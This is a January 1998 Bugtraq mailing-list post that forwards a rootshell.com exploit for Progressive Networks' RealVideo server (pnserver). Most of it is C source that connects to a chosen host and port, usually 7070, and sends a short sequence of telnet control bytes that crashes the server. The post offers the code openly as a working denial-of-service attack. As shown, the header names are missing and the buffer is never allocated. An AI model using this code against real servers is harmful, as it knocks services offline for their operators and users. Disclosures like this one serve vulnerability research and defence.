Date: Thu, 15 Jan 1998 21:22:43 -0600 From: Aleph One To: BUGTRAQ@NETSPACE.ORG Subject: pnserver exploit.. Courtesy of the fine folks at rootshell. -- forward -- It seems that the pnserver bug was different than first thought. The telnet client sends 6 characters that crash the server when its own maxbuffer is reached. Here is a working exploit. /* * pnserver exploit [1/15/98] * * Crash's Progressive Networks Real Video Server [ http://www.real.com/ ] * * [ http://www.rootshell.com/ ] * * Compiled under linux. * */ #include #include #include #include #include #include #include void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; char *buffer; int sock; if (argc != 3) { printf("usage: %s \n\nNote: Try port 7070.\n\n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Unknown host: %s\n",argv[1]); exit(1); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(atoi(argv[2])); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); sprintf(buffer, "%c%c%c%c%c", 255, 244, 255, 253, 6); write(sock, &buffer[0], strlen(buffer)); close(sock); }